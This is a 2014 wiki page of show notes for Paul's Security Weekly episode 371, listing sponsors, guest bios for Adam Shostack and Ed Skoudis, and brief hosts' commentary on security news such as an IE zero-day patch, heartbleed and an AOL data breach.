From Security Weekly Wiki
Jump to navigationJump to search

Episode Media

MP3 pt1

MP3 pt2

MP3 pt3


Paul's Security Weekly - Episode 371 for Thursday May 1st, 2014

  • This segment is sponsored by Palo Alto Networks creators of THE next-generation firewalls, helping you enforce network security policies based on applications, users, and content. Visit them on the web at www.paloaltonetworks.com
  • and by Tenable Network Security, the creators of Nessus, the worlds best vulnerability scanner. Check out Tenable's other cool products such as the passive vulnerability scanner and SecurityCenter Continuous View. Visit them on the web at www.tenable.com

Guest Interview: Adam Shostack


Adam Shostack is part of Microsoft’s Security Development Lifecycle strategy team, where he is responsible for security design analysis techniques. Before Microsoft, Adam was involved in a number of successful start-ups focused on vulnerability scanning, privacy, and program analysis. he is an accomplished writer, and speaker. Most recently, a great book "Threat Modeling: Designing for Security".

Five Questions

  1. Three words to describe yourself
  2. If you were a serial killer, what would be your weapon of choice?
  3. If you wrote a book about yourself, what would the title be?
  4. In the popular game of Ass Grabby Grabby do you prefer to go first or second?
  5. If you could have dinner with one celebrity, who would it be?

Ed Skoudis

  • This segment is brought to you by The SANS institute the most trusted source for computer security training, certification and research. visit www.sans.org to learn more


Ed Skoudis is the founder of Counter Hack, an innovative organization that designs, builds, and operates popular infosec challenges and simulations including CyberCity, NetWars, Cyber Quests, and Cyber Foundations. As director of the CyberCity project, Ed oversees the development of missions which help train cyber warriors in how to defend the kinetic assets of a physical, miniaturized city. Ed's expertise includes hacker attacks and defenses, incident response, and malware analysis, with over fifteen years of experience in information security. Ed authored and regularly teaches the SANS courses on network penetration testing.


  • This segment is brought to you by http://www.blacksquirrel.io/ - Pentest Networks from Your Browser! Exploit the limits of network security through just a browser. Have a Chrome exploit in your toolkit? Good, but for the rest of us there's Black Squirrel. Visit blacksquirrel.io for more information.
  • and by Onapsis the leading provider of solutions to protect ERP systems from cyber-attacks. Customers can secure their SAP and Oracle business-critical platforms from espionage, sabotage and financial fraud risks. Visit them on the web at http://www.onapsis.com/
  • and by Pwnie Express - Check out the community edition and turn your Nexus 7 into a lean and mean pen testing machine. For all those hard to reach places, there's Pwnie Express, visit them on the web at pwnieexpress.com
  • CircleCityCon is the first hacker con in Indianapolis.It is in a small to medium sized venue located in the heart of Indianapolis. general admission ticket: Jan 1, 2014 - until sold out, when: June 13-15, 2014.

Paul's Stories

  1. Google stops scanning Gmail messages for ads in Apps for Education - Network World - By scanning, they mean looking at the content and producing ads. Yuk. But good for students.
  2. Hacking Traffic Systems for Fun and Chaos - I've heard stories about hacking traffic systems. Are they wireless? Anyone? In any case, this can cause chaos, but you can also use it if you want to rob a bank and make a super fast get away. Maybe. I don't see how you could profit, $$ wise anyhow, from it.
  3. Windows XP Systems Also Get Out-of-Band IE Zero-Day Patch - "We will not issue patches for XP any longer". Oh wait, "Well, okay maybe just this one time". While this helps protect people from harm, it does little to foster migration to a more modern operating system.
  4. Popular Ad Blocker Drops Support for IE6 and IE7 - This is going to happen more and more, what happens when ad blockers, AV and whitelisting software starts dropping support for older technology? If this doesn't light a fire, I don't know what does.
  5. What a Toilet Hoax Can Tell Us About the Future of Surveillance - Jennifer Golbeck - The Atlantic - Yea, okay, this was a hoaxtelling people that data was being collected from the toilets about "deposits" being made and reporting that back anonymously for public health, including analyzing samples for disease. Lets put the Tosh.0 30 seconds on the clock and see how many inapprorpiate toilet jokes we can make: "Well, that's pretty shitty. I'm so tired of people collecting my personal shit. This has to piss people off. Gives new meaning to taking a shit. I can't believe we let them get away with this shit. I guess in the end, they were full of shit."
  6. Black Hills Information Security, THE source for all of your penetration testing needs. Please visit www.blackhillsinfosec.com for more information and use the contact page to request a quote!
  7. JTAG Slides - Awesome presentation from my hero, Craig Heffner. #mancrush
  8. Fun with IDS funtime #3: heartbleed - Turns out IDS is really is dead.
  9. The Rise of the Insider in a Collaborative IT World - Do we have to talk about insider threat again?
  10. AOL Subscriber Data Stolen: You've Got Pwned - Who the f**k still uses AOL? Oh, 2.5 million people. How many of those are active users though?

Larry's Stories

  1. Target and Chip-and-pin - Target looking to move to chip and pin, and fast. The problem that I can see is that yes, great, all of the readers will support it, but the only cards they can get semi-fast support for is the Target branded cards….what about every other card used out there?
  2. IE 0-day All the way form IE 6 to 11. Turns out that Microsoft is releasing patches for XP. uhhh, MS, unsupported, I don't think that word means what you think it does. Same for EOL.

Jack's Stories

Joff's Stories

  1. https://bitbucket.org/jsthyer/powerbleed - A powershell module to check for the OpenSSL heartbleed vulnerability and bleed out data if

you want it. Please check it out but be very careful with testing embedded systems.